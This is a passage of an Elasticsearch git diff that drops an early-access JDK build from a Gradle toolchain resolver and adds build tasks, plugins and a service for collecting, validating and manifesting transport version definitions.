b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java index 41a47ece90d5d..a0036529ad6fe 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java @@ -58,26 +58,6 @@ public String url(String os, String arch, String extension) { } } - record EarlyAccessJdkBuild(JavaLanguageVersion languageVersion, String buildNumber) implements JdkBuild { - @Override - public String url(String os, String arch, String extension) { - return "https://download.java.net/java/early_access/jdk" - + languageVersion.asInt() - + "/" - + buildNumber - + "/GPL/openjdk-" - + languageVersion.asInt() - + "-ea+" - + buildNumber - + "_" - + os - + "-" - + arch - + "_bin." - + extension; - } - } - private static final Pattern VERSION_PATTERN = Pattern.compile( "(\\d+)(\\.\\d+\\.\\d+(?:\\.\\d+)?)?\\+(\\d+(?:\\.\\d+)?)(@([a-f0-9]{32}))?" ); @@ -90,18 +70,9 @@ public String url(String os, String arch, String extension) { // package private so it can be replaced by tests List builds = List.of( - getBundledJdkBuild(VersionProperties.getBundledJdkVersion(), VersionProperties.getBundledJdkMajorVersion()), - getEarlyAccessBuild(JavaLanguageVersion.of(25), "3") + getBundledJdkBuild(VersionProperties.getBundledJdkVersion(), VersionProperties.getBundledJdkMajorVersion()) ); - static EarlyAccessJdkBuild getEarlyAccessBuild(JavaLanguageVersion languageVersion, String buildNumber) { - // first try the unversioned override, then the versioned override which has higher precedence - buildNumber = System.getProperty("runtime.java.build", buildNumber); - buildNumber = System.getProperty("runtime.java." + languageVersion.asInt() + ".build", buildNumber); - - return new EarlyAccessJdkBuild(languageVersion, buildNumber); - } - static JdkBuild getBundledJdkBuild(String bundledJdkVersion, String bundledJkdMajorVersionString) { JavaLanguageVersion bundledJdkMajorVersion = JavaLanguageVersion.of(bundledJkdMajorVersionString); Matcher jdkVersionMatcher = VERSION_PATTERN.matcher(bundledJdkVersion); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java new file mode 100644 index 0000000000000..d572abb848d1c --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java @@ -0,0 +1,132 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import org.gradle.api.DefaultTask;
+import org.gradle.api.file.ConfigurableFileCollection;
+import org.gradle.api.file.RegularFileProperty;
+import org.gradle.api.tasks.CacheableTask;
+import org.gradle.api.tasks.Classpath;
+import org.gradle.api.tasks.OutputFile;
+import org.gradle.api.tasks.TaskAction;
+import org.objectweb.asm.ClassReader;
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.Label;
+import org.objectweb.asm.MethodVisitor;
+import org.objectweb.asm.Opcodes;
+import org.objectweb.asm.tree.LdcInsnNode;
+import org.objectweb.asm.tree.MethodNode;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.nio.file.FileVisitResult;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.SimpleFileVisitor;
+import java.nio.file.attribute.BasicFileAttributes;
+import java.util.HashSet;
+import java.util.Set;
+
+/**
+ * This task locates all method invocations of org.elasticsearch.TransportVersion#fromName(java.lang.String) in the
+ * provided class directories and records the value of the string literal passed to each invocation. Each string is
+ * written on its own line in the provided output file, together with the class name and line number where it was found.
+ */
+@CacheableTask
+public abstract class CollectTransportVersionReferencesTask extends DefaultTask {
+    public static final String TRANSPORT_VERSION_SET_CLASS = "org/elasticsearch/TransportVersion";
+    public static final String TRANSPORT_VERSION_SET_METHOD_NAME = "fromName";
+    public static final String CLASS_EXTENSION = ".class";
+    public static final String MODULE_INFO = "module-info.class";
+
+    /**
+     * The classpath to scan for method invocations; only class directories are visited.
+     */
+    @Classpath
+    public abstract ConfigurableFileCollection getClassPath();
+
+    /**
+     * The output file, with each line containing the string literal argument of a method
+     * invocation and the location where it was found.
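+     * A hypothetical entry (definition name and class are illustrative) looks like:
+     *   my_new_transport_version,org.elasticsearch.action.SomeAction line 42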
+ */ + @OutputFile + public abstract RegularFileProperty getOutputFile(); + + @TaskAction + public void checkTransportVersion() throws IOException { + var results = new HashSet(); + + for (var cpElement : getClassPath()) { + Path file = cpElement.toPath(); + if (Files.isDirectory(file)) { + addNamesFromClassesDirectory(results, file); + } + } + + Path outputFile = getOutputFile().get().getAsFile().toPath(); + Files.writeString(outputFile, String.join("\n", results.stream().map(Object::toString).sorted().toList())); + } + + private void addNamesFromClassesDirectory(Set results, Path basePath) throws IOException { + Files.walkFileTree(basePath, new SimpleFileVisitor<>() { + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException { + String filename = file.getFileName().toString(); + if (filename.endsWith(CLASS_EXTENSION) && filename.endsWith(MODULE_INFO) == false) { + try (var inputStream = Files.newInputStream(file)) { + addNamesFromClass(results, inputStream, classname(basePath.relativize(file).toString())); + } + } + return FileVisitResult.CONTINUE; + } + }); + } + + private void addNamesFromClass(Set results, InputStream classBytes, String classname) throws IOException { + ClassVisitor classVisitor = new ClassVisitor(Opcodes.ASM9) { + @Override + public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) { + return new MethodNode(Opcodes.ASM9, access, name, descriptor, signature, exceptions) { + int lineNumber = -1; + + @Override + public void visitLineNumber(int line, Label start) { + lineNumber = line; + } + + @Override + public void visitMethodInsn(int opcode, String owner, String name, String descriptor, boolean isInterface) { + if (owner.equals(TRANSPORT_VERSION_SET_CLASS) && name.equals(TRANSPORT_VERSION_SET_METHOD_NAME)) { + var abstractInstruction = this.instructions.getLast(); + String location = classname + " line " + lineNumber; + if (abstractInstruction instanceof LdcInsnNode ldcInsnNode + && ldcInsnNode.cst instanceof String tvName + && tvName.isEmpty() == false) { + results.add(new TransportVersionReference(tvName, location)); + } else { + // The instruction is not a LDC with a String constant (or an empty String), which is not allowed. + throw new RuntimeException( + "TransportVersion.fromName must be called with a non-empty String literal. " + "See " + location + "." + ); + } + } + super.visitMethodInsn(opcode, owner, name, descriptor, isInterface); + } + }; + } + }; + ClassReader classReader = new ClassReader(classBytes); + classReader.accept(classVisitor, 0); + } + + private static String classname(String filename) { + return filename.substring(0, filename.length() - CLASS_EXTENSION.length()).replaceAll("[/\\\\]", "."); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java new file mode 100644 index 0000000000000..f0a0ee09cd3a2 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java @@ -0,0 +1,60 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. 
Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.RegularFileProperty; +import org.gradle.api.provider.Property; +import org.gradle.api.services.ServiceReference; +import org.gradle.api.tasks.InputDirectory; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.OutputFile; +import org.gradle.api.tasks.PathSensitive; +import org.gradle.api.tasks.PathSensitivity; +import org.gradle.api.tasks.TaskAction; + +import java.io.IOException; +import java.nio.file.FileVisitResult; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.SimpleFileVisitor; +import java.nio.file.attribute.BasicFileAttributes; + +public abstract class GenerateTransportVersionManifestTask extends DefaultTask { + + @ServiceReference("transportVersionResources") + abstract Property getTransportResources(); + + @InputDirectory + @Optional + @PathSensitive(PathSensitivity.RELATIVE) + public Path getDefinitionsDirectory() { + return getTransportResources().get().getDefinitionsDir(); + } + + @OutputFile + public abstract RegularFileProperty getManifestFile(); + + @TaskAction + public void generateTransportVersionManifest() throws IOException { + Path definitionsDir = getDefinitionsDirectory(); + Path manifestFile = getManifestFile().get().getAsFile().toPath(); + try (var writer = Files.newBufferedWriter(manifestFile)) { + Files.walkFileTree(definitionsDir, new SimpleFileVisitor<>() { + @Override + public FileVisitResult visitFile(Path path, BasicFileAttributes attrs) throws IOException { + String subPath = definitionsDir.relativize(path).toString().replace('\\', '/'); + writer.write(subPath + "\n"); + return FileVisitResult.CONTINUE; + } + }); + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java new file mode 100644 index 0000000000000..65f4caeb95206 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionDefinition.java @@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.gradle.internal.transport; + +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.List; + +record TransportVersionDefinition(String name, List ids) { + public static TransportVersionDefinition fromString(Path file, String contents) { + String filename = file.getFileName().toString(); + assert filename.endsWith(".csv"); + String name = filename.substring(0, filename.length() - 4); + List ids = new ArrayList<>(); + + if (contents.isEmpty() == false) { + for (String rawId : contents.split(",")) { + try { + ids.add(TransportVersionId.fromString(rawId)); + } catch (NumberFormatException e) { + throw new IllegalStateException("Failed to parse id " + rawId + " in " + file, e); + } + } + } + + return new TransportVersionDefinition(name, ids); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java new file mode 100644 index 0000000000000..407c3bd511f09 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionId.java @@ -0,0 +1,37 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +record TransportVersionId(int complete, int major, int server, int subsidiary, int patch) implements Comparable { + + static TransportVersionId fromString(String s) { + int complete = Integer.parseInt(s); + int patch = complete % 100; + int subsidiary = (complete / 100) % 10; + int server = (complete / 1000) % 1000; + int major = complete / 1000000; + return new TransportVersionId(complete, major, server, subsidiary, patch); + } + + @Override + public int compareTo(TransportVersionId o) { + // note: this is descending order so the arguments are reversed + return Integer.compare(o.complete, complete); + } + + @Override + public String toString() { + return Integer.toString(complete); + } + + public int base() { + return (complete / 1000) * 1000; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java new file mode 100644 index 0000000000000..f94f4fc6d9b6b --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReference.java @@ -0,0 +1,61 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import org.gradle.api.attributes.Attribute;
+import org.gradle.api.attributes.AttributeContainer;
+
+import java.io.File;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.util.ArrayList;
+import java.util.HashSet;
+import java.util.List;
+import java.util.Set;
+
+import static org.gradle.api.artifacts.type.ArtifactTypeDefinition.ARTIFACT_TYPE_ATTRIBUTE;
+
+record TransportVersionReference(String name, String location) {
+
+    private static final Attribute<Boolean> REFERENCES_ATTRIBUTE = Attribute.of("transport-version-references", Boolean.class);
+
+    static List<TransportVersionReference> listFromFile(Path file) throws IOException {
+        assert file.endsWith(".csv");
+        List<TransportVersionReference> results = new ArrayList<>();
+        for (String line : Files.readAllLines(file, StandardCharsets.UTF_8)) {
+            // each line is "name,location"; the location may itself contain commas, so split at most once
+            String[] parts = line.split(",", 2);
+            if (parts.length != 2) {
+                throw new IOException("Invalid transport version data file [" + file + "]: " + line);
+            }
+            results.add(new TransportVersionReference(parts[0], parts[1]));
+        }
+        return results;
+    }
+
+    static void addArtifactAttribute(AttributeContainer attributes) {
+        attributes.attribute(ARTIFACT_TYPE_ATTRIBUTE, "csv");
+        attributes.attribute(REFERENCES_ATTRIBUTE, true);
+    }
+
+    static Set<String> collectNames(Iterable<File> referencesFiles) throws IOException {
+        Set<String> names = new HashSet<>();
+        for (var referencesFile : referencesFiles) {
+            listFromFile(referencesFile.toPath()).stream().map(TransportVersionReference::name).forEach(names::add);
+        }
+        return names;
+    }
+
+    @Override
+    public String toString() {
+        return name + "," + location;
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java
new file mode 100644
index 0000000000000..5ee561764b5a4
--- /dev/null
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionReferencesPlugin.java
@@ -0,0 +1,55 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import org.elasticsearch.gradle.internal.ProjectSubscribeServicePlugin;
+import org.elasticsearch.gradle.util.GradleUtils;
+import org.gradle.api.Plugin;
+import org.gradle.api.Project;
+import org.gradle.api.tasks.SourceSet;
+import org.gradle.language.base.plugins.LifecycleBasePlugin;
+
+import static org.elasticsearch.gradle.internal.transport.TransportVersionResourcesPlugin.TRANSPORT_REFERENCES_TOPIC;
+
+public class TransportVersionReferencesPlugin implements Plugin<Project> {
+
+    @Override
+    public void apply(Project project) {
+        project.getPluginManager().apply(LifecycleBasePlugin.class);
+
+        project.getPlugins()
+            .apply(ProjectSubscribeServicePlugin.class)
+            .getService()
+            .get()
+            .registerProjectForTopic(TRANSPORT_REFERENCES_TOPIC, project);
+
+        var collectTask = project.getTasks()
+            .register("collectTransportVersionReferences", CollectTransportVersionReferencesTask.class, t -> {
+                t.setGroup("Transport Versions");
+                t.setDescription("Collects all TransportVersion references used throughout the project");
+                SourceSet mainSourceSet = GradleUtils.getJavaSourceSets(project).findByName(SourceSet.MAIN_SOURCE_SET_NAME);
+                t.getClassPath().setFrom(mainSourceSet.getOutput());
+                t.getOutputFile().set(project.getLayout().getBuildDirectory().file("transport-version/references.txt"));
+            });
+
+        var tvReferencesConfig = project.getConfigurations().consumable("transportVersionReferences", c -> {
+            c.attributes(TransportVersionReference::addArtifactAttribute);
+        });
+        project.getArtifacts().add(tvReferencesConfig.getName(), collectTask);
+
+        var validateTask = project.getTasks()
+            .register("validateTransportVersionReferences", ValidateTransportVersionReferencesTask.class, t -> {
+                t.setGroup("Transport Versions");
+                t.setDescription("Validates that all TransportVersion references used in the project have an associated definition file");
+                t.getReferencesFile().set(collectTask.get().getOutputFile());
+            });
+        project.getTasks().named(LifecycleBasePlugin.CHECK_TASK_NAME).configure(t -> t.dependsOn(validateTask));
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java
new file mode 100644
index 0000000000000..2b1c61ecd75d4
--- /dev/null
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesPlugin.java
@@ -0,0 +1,78 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import org.elasticsearch.gradle.internal.ProjectSubscribeServicePlugin;
+import org.gradle.api.Plugin;
+import org.gradle.api.Project;
+import org.gradle.api.file.Directory;
+import org.gradle.api.plugins.JavaPlugin;
+import org.gradle.api.tasks.Copy;
+import org.gradle.language.base.plugins.LifecycleBasePlugin;
+
+import java.util.Map;
+
+public class TransportVersionResourcesPlugin implements Plugin<Project> {
+
+    public static final String TRANSPORT_REFERENCES_TOPIC = "transportReferences";
+
+    @Override
+    public void apply(Project project) {
+        project.getPluginManager().apply(LifecycleBasePlugin.class);
+        var psService = project.getPlugins().apply(ProjectSubscribeServicePlugin.class).getService();
+        var resourceRoot = getResourceRoot(project);
+
+        project.getGradle()
+            .getSharedServices()
+            .registerIfAbsent("transportVersionResources", TransportVersionResourcesService.class, spec -> {
+                Directory transportResources = project.getLayout().getProjectDirectory().dir("src/main/resources/" + resourceRoot);
+                spec.getParameters().getTransportResourcesDirectory().set(transportResources);
+                spec.getParameters().getRootDirectory().set(project.getLayout().getSettingsDirectory().getAsFile());
+            });
+
+        var depsHandler = project.getDependencies();
+        var tvReferencesConfig = project.getConfigurations().create("globalTvReferences", c -> {
+            c.setCanBeConsumed(false);
+            c.setCanBeResolved(true);
+            c.attributes(TransportVersionReference::addArtifactAttribute);
+            c.getDependencies()
+                .addAllLater(
+                    psService.flatMap(t -> t.getProjectsByTopic(TRANSPORT_REFERENCES_TOPIC))
+                        .map(projectPaths -> projectPaths.stream().map(path -> depsHandler.project(Map.of("path", path))).toList())
+                );
+        });
+
+        var validateTask = project.getTasks()
+            .register("validateTransportVersionResources", ValidateTransportVersionResourcesTask.class, t -> {
+                t.setGroup("Transport Versions");
+                t.setDescription("Validates that all transport version resources are internally consistent with each other");
+                t.getReferencesFiles().setFrom(tvReferencesConfig);
+            });
+        project.getTasks().named(LifecycleBasePlugin.CHECK_TASK_NAME).configure(t -> t.dependsOn(validateTask));
+
+        var generateManifestTask = project.getTasks()
+            .register("generateTransportVersionManifest", GenerateTransportVersionManifestTask.class, t -> {
+                t.setGroup("Transport Versions");
+                t.setDescription("Generate a manifest resource for all transport version definitions");
+                t.getManifestFile().set(project.getLayout().getBuildDirectory().file("generated-resources/manifest.txt"));
+            });
+        project.getTasks().named(JavaPlugin.PROCESS_RESOURCES_TASK_NAME, Copy.class).configure(t -> {
+            t.into("transport/definitions", c -> c.from(generateManifestTask));
+        });
+    }
+
+    private static String getResourceRoot(Project project) {
+        var resourceRoot = project.findProperty("org.elasticsearch.transport.resourceRoot");
+        if (resourceRoot == null) {
+            resourceRoot = "transport";
+        }
+        return resourceRoot.toString();
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java
new file mode 100644
index 0000000000000..239ab0c9ab493
--- /dev/null
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionResourcesService.java
@@ -0,0 +1,254 @@
+/*
+ * Copyright Elasticsearch B.V.
and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.file.DirectoryProperty; +import org.gradle.api.services.BuildService; +import org.gradle.api.services.BuildServiceParameters; +import org.gradle.process.ExecOperations; +import org.gradle.process.ExecResult; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.atomic.AtomicReference; +import java.util.function.BiFunction; + +import javax.inject.Inject; + +/** + * An encapsulation of operations on transport version resources. + * + *

<p>These are resource files to describe transport versions that will be loaded at Elasticsearch runtime. They exist
+ * as jar resource files at runtime, and as a directory of resources at build time.
+ *
+ * <p>The layout of the transport version resources is as follows:
+ * <ul>
+ *   <li>{@code /transport/definitions/referable/} - Definitions that can be looked up by name. The name is the
+ *   filename before the .csv suffix.</li>
+ *   <li>{@code /transport/definitions/unreferable/} - Definitions which contain ids that are known at runtime, but
+ *   cannot be looked up by name.</li>
+ *   <li>{@code /transport/upper_bounds/} - The maximum transport version definition that will be loaded for each
+ *   release branch.</li>
+ * </ul>
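+ *
+ * <p>As an illustrative, hypothetical example: a referable definition {@code definitions/referable/my_new_feature.csv}
+ * containing {@code 9123000,8841001} declares a primary id plus one backported patch id, while an upper bound file
+ * {@code upper_bounds/9.0.csv} containing {@code my_new_feature,9123000} records that definition as the maximum loaded
+ * on the 9.0 release branch. The names and ids here are invented; only the directory layout above is prescribed.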
+ */
+public abstract class TransportVersionResourcesService implements BuildService<TransportVersionResourcesService.Parameters> {
+
+    public interface Parameters extends BuildServiceParameters {
+        DirectoryProperty getTransportResourcesDirectory();
+
+        DirectoryProperty getRootDirectory();
+    }
+
+    @Inject
+    public abstract ExecOperations getExecOperations();
+
+    private static final Path DEFINITIONS_DIR = Path.of("definitions");
+    private static final Path REFERABLE_DIR = DEFINITIONS_DIR.resolve("referable");
+    private static final Path UNREFERABLE_DIR = DEFINITIONS_DIR.resolve("unreferable");
+    private static final Path UPPER_BOUNDS_DIR = Path.of("upper_bounds");
+
+    private final Path transportResourcesDir;
+    private final Path rootDir;
+    private final AtomicReference<Set<String>> mainResources = new AtomicReference<>(null);
+    private final AtomicReference<Set<String>> changedResources = new AtomicReference<>(null);
+
+    @Inject
+    public TransportVersionResourcesService(Parameters params) {
+        this.transportResourcesDir = params.getTransportResourcesDirectory().get().getAsFile().toPath();
+        this.rootDir = params.getRootDirectory().get().getAsFile().toPath();
+    }
+
+    /**
+     * Return the directory for this repository which contains transport version resources.
+     * This should be an input to any tasks reading resources from this service.
+     */
+    Path getTransportResourcesDir() {
+        return transportResourcesDir;
+    }
+
+    /**
+     * Return the transport version definitions directory for this repository.
+     * This should be an input to any tasks that only read definitions from this service.
+     */
+    Path getDefinitionsDir() {
+        return transportResourcesDir.resolve(DEFINITIONS_DIR);
+    }
+
+    // return the path, relative to the resources dir, of a referable definition
+    private Path getReferableDefinitionRelativePath(String name) {
+        return REFERABLE_DIR.resolve(name + ".csv");
+    }
+
+    /** Return all referable definitions, mapped by their name. */
+    Map<String, TransportVersionDefinition> getReferableDefinitions() throws IOException {
+        return readDefinitions(transportResourcesDir.resolve(REFERABLE_DIR));
+    }
+
+    /** Get a referable definition from main if it exists there, or null otherwise */
+    TransportVersionDefinition getReferableDefinitionFromMain(String name) {
+        Path resourcePath = getReferableDefinitionRelativePath(name);
+        return getMainFile(resourcePath, TransportVersionDefinition::fromString);
+    }
+
+    /** Test whether the given referable definition exists */
+    boolean referableDefinitionExists(String name) {
+        return Files.exists(transportResourcesDir.resolve(getReferableDefinitionRelativePath(name)));
+    }
+
+    /** Return the path within the repository of the given named definition */
+    Path getReferableDefinitionRepositoryPath(TransportVersionDefinition definition) {
+        return rootDir.relativize(transportResourcesDir.resolve(getReferableDefinitionRelativePath(definition.name())));
+    }
+
+    // return the path, relative to the resources dir, of an unreferable definition
+    private Path getUnreferableDefinitionRelativePath(String name) {
+        return UNREFERABLE_DIR.resolve(name + ".csv");
+    }
+
+    /** Return all unreferable definitions, mapped by their name. */
+    Map<String, TransportVersionDefinition> getUnreferableDefinitions() throws IOException {
+        return readDefinitions(transportResourcesDir.resolve(UNREFERABLE_DIR));
+    }
+
+    /** Get an unreferable definition from main if it exists there, or null otherwise */
+    TransportVersionDefinition getUnreferableDefinitionFromMain(String name) {
+        Path resourcePath = getUnreferableDefinitionRelativePath(name);
+        return getMainFile(resourcePath, TransportVersionDefinition::fromString);
+    }
+
+    /** Return the path within the repository of the given unreferable definition */
+    Path getUnreferableDefinitionRepositoryPath(TransportVersionDefinition definition) {
+        return rootDir.relativize(transportResourcesDir.resolve(getUnreferableDefinitionRelativePath(definition.name())));
+    }
+
+    /** Read all upper bound files and return them mapped by their release branch */
+    Map<String, TransportVersionUpperBound> getUpperBounds() throws IOException {
+        Map<String, TransportVersionUpperBound> upperBounds = new HashMap<>();
+        try (var stream = Files.list(transportResourcesDir.resolve(UPPER_BOUNDS_DIR))) {
+            for (var latestFile : stream.toList()) {
+                String contents = Files.readString(latestFile, StandardCharsets.UTF_8).strip();
+                var upperBound = TransportVersionUpperBound.fromString(latestFile, contents);
+                upperBounds.put(upperBound.branch(), upperBound);
+            }
+        }
+        return upperBounds;
+    }
+
+    /** Retrieve the latest transport version for the given release branch on main */
+    TransportVersionUpperBound getUpperBoundFromMain(String releaseBranch) {
+        Path resourcePath = getUpperBoundRelativePath(releaseBranch);
+        return getMainFile(resourcePath, TransportVersionUpperBound::fromString);
+    }
+
+    /** Return the path within the repository of the given upper bound */
+    Path getUpperBoundRepositoryPath(TransportVersionUpperBound latest) {
+        return rootDir.relativize(transportResourcesDir.resolve(getUpperBoundRelativePath(latest.branch())));
+    }
+
+    private Path getUpperBoundRelativePath(String releaseBranch) {
+        return UPPER_BOUNDS_DIR.resolve(releaseBranch + ".csv");
+    }
+
+    // Return the transport version resources paths that exist in main
+    private Set<String> getMainResources() {
+        if (mainResources.get() == null) {
+            synchronized (mainResources) {
+                String output = gitCommand("ls-tree", "--name-only", "-r", "main", ".");
+
+                HashSet<String> resources = new HashSet<>();
+                Collections.addAll(resources, output.split("\n")); // git always outputs LF
+                mainResources.set(resources);
+            }
+        }
+        return mainResources.get();
+    }
+
+    // Return the transport version resources paths that have been changed relative to main
+    private Set<String> getChangedResources() {
+        if (changedResources.get() == null) {
+            synchronized (changedResources) {
+                String output = gitCommand("diff", "--name-only", "main", ".");
+
+                HashSet<String> resources = new HashSet<>();
+                Collections.addAll(resources, output.split("\n")); // git always outputs LF
+                changedResources.set(resources);
+            }
+        }
+        return changedResources.get();
+    }
+
+    // Read a transport version resource from the main branch, or return null if it doesn't exist on main
+    private <T> T getMainFile(Path resourcePath, BiFunction<Path, String, T> parser) {
+        String pathString = resourcePath.toString().replace('\\', '/'); // normalize to forward slash that git uses
+        if (getMainResources().contains(pathString) == false) {
+            return null;
+        }
+
+        String content = gitCommand("show", "main:./" + pathString).strip();
+        return parser.apply(resourcePath, content);
+    }
+
+    private static Map<String, TransportVersionDefinition> readDefinitions(Path dir) throws IOException {
+        if (Files.isDirectory(dir) == false) {
+            return Map.of();
+        }
+        Map<String, TransportVersionDefinition> definitions = new HashMap<>();
+        try (var definitionsStream = Files.list(dir)) {
+            for (var definitionFile : definitionsStream.toList()) {
+                String contents = Files.readString(definitionFile, StandardCharsets.UTF_8).strip();
+                var definition = TransportVersionDefinition.fromString(definitionFile, contents);
+                definitions.put(definition.name(), definition);
+            }
+        }
+        return definitions;
+    }
+
+    // run a git command, relative to the transport version resources directory
+    private String gitCommand(String... args) {
+        ByteArrayOutputStream stdout = new ByteArrayOutputStream();
+
+        List<String> command = new ArrayList<>();
+        Collections.addAll(command, "git", "-C", getTransportResourcesDir().toString());
+        Collections.addAll(command, args);
+
+        ExecResult result = getExecOperations().exec(spec -> {
+            spec.setCommandLine(command);
+            spec.setStandardOutput(stdout);
+            spec.setErrorOutput(stdout);
+            spec.setIgnoreExitValue(true);
+        });
+
+        if (result.getExitValue() != 0) {
+            throw new RuntimeException(
+                "git command failed with exit code "
+                    + result.getExitValue()
+                    + System.lineSeparator()
+                    + "command: "
+                    + String.join(" ", command)
+                    + System.lineSeparator()
+                    + "output:"
+                    + System.lineSeparator()
+                    + stdout.toString(StandardCharsets.UTF_8)
+            );
+        }

+        return stdout.toString(StandardCharsets.UTF_8);
+    }
+}
